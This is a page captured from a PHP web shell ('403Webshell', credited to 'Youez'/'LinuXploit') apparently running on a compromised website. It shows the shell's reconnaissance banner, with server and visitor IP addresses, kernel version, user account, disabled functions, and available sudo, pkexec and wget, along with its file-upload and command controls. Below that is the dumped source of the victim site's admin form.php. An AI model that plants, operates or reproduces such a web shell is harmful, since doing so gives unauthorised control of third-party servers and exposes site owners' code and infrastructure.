403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/playwithfaye.com/public_html/free2/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/playwithfaye.com/public_html/free2/admin//form.php
<?php

 if($act == "form")	{
 	$media ='';
	$hide='';
	$asset_id='';	?>
		<form action="insert.php" style="margin-bottom: 0pt; margin-top: 0pt;" method="post">
<?php 	
}elseif($act == "nowmod" || $num_rows == '1'){?>
		<form action="update.php" style="margin-bottom: 0pt; margin-top: 0pt;" method="post">
<?php }?>
<input name="asset_id" type="hidden" value="<?php echo $asset_id ?>"> 

<table>
<tr>
	<td align="right">Title: </td>
	<td align="left">
	<input type="text" name="tour_title" class="input400" value="<?php if(isset($tour_title)){echo $tour_title;} ?>" />
	<?php if($act == "nowmod"){  ?>
	<a href="<?php echo TOUR_URL ?>/build.php?asset_id=<?php echo $asset_id ?>&t=s" target="_blank">See This Feeder</a>
	<?php }?>
	</td>
</tr>
<tr>
	<td align="right">User Defined ID: </td>
	<td align="left">
	<input type="text" name="user_def_id" class="input400" value="<?php if(isset($user_def_id)){echo $user_def_id;} ?>" />
	</td>
</tr>
<tr>
	<td align="right">Media: </td>
	<td align="left" style="padding-left:8px;" valign="top">
	<label>Video</label> <input name="media" type="radio" value="V" <?php if($media =='V'){echo "checked";}  ?>> <label>Photo</label> <input name="media" type="radio" value="P"<?php if($media =='P'){echo "checked";}  ?>>
	</td>
</tr>
<tr>
	<td align="right">Tour Start Date: </td>
	<td align="left">
	<input type="text" class="input150" name="tour_date" value="<?php if(isset($tour_date)){echo $tour_date;} ?>" onFocus="showCalendar('',this,this,'','holder1',0,30,1)">
	</td>
</tr>
<tr>
	<td align="right" valign="top">Starring:</td>
	<td style="padding-left:0px;" align="left"><?php  get_mod_names_tour($connection, $asset_id); 

	?></td>
</tr>
<tr>
	<td  align="right" valign="top">Description: </td>
	<td align="left" style="padding-left:06px;"><textarea name="tour_description" cols="50" class="inputT01"><?php if(isset($tour_description)){echo $tour_description;}?></textarea></td>
</tr>
<tr>
	<td align="right">Video Name: </td>
	<td align="left">
	<input type="text" name="video_name" class="input400" value="<?php if(isset($video_name)){echo $video_name;} ?>" />
	</td>
</tr>
<tr>
	<td align="right">Photo Count: </td>
	<td align="left">
	<input type="text" name="photo_count" class="input400" value="<?php if(isset($photo_count)){echo $photo_count;} ?>" />
	</td>
</tr>
<tr>
	<td align="right" valign="top">Niche: </td>
	<td class="archive2text" align="left">
	<?php
	
	  get_niche($connection, $asset_id);  ?>
	
	
	</td>
</tr>
<tr>
	<td></td>
	<td colspan = "1">
		<table width="100%" border="0" style="padding-left:5px;">
			<?php if($act == "nowmod"){  ?>
			<th width="150" bgcolor="#FF8080" style="border:ridge 1px #cc0000;">
			<a href="javascript:ShowPopup('zip_popupload.php?asset_id=<?php echo $asset_id ?>&f_date=<?php echo $f_date ?>')">Upload a Zip</a>
			
			</th>
			<?php }?>
			<td align="right">Live?:   No<input name="hide" type="radio" value="n" <?php if ($hide == "y" || $hide != "n") echo "checked=\"checked\"";?>> 
	&nbsp;Yes<input name="hide" type="radio" value="y" / <?php if ($hide == "n") echo "checked=\"checked\"";?>>
			</td>
		</table>	
		
<!--		<table width="100%" border="0" style="padding-left:5px;">
			<?php if($act == "nowmod"){  ?>
			<th width="150" bgcolor="#FF8080" style="border:ridge 1px #cc0000;">
			<a href="javascript:ShowPopup('zip_popupload.php?asset_id=<?php echo $asset_id ?>&f_date=<?php echo $f_date ?>&t=h')">Make a Hosted Gallery</a>
			
			</th>
			<?php }?>
			<td align="right">
			</td>
		</table>	-->		
	</td>
</tr> 
<tr>
	<td colspan="2" style="padding:10px;">
	<div align="center">
<?php if($act == "form"){?>
		<input type="submit" value="Submit" class="button" />
<?php }
elseif($act == "nowmod" || $num_rows == '1'){?>
		<input type="hidden" name="asset_id" value="<?php echo $asset_id; ?>" />
		<!--<input type="hidden" name="tour_title" value="<?php echo $tour_title; ?>" />-->
		<input type="submit" value="Modify" class="button" /> <input type="submit" name="delete" value="Delete" class="button" />
<?php }?>
		
	</div>
	</td>
</tr>
</table></form>

Youez - 2016 - github.com/yon3zu
LinuXploit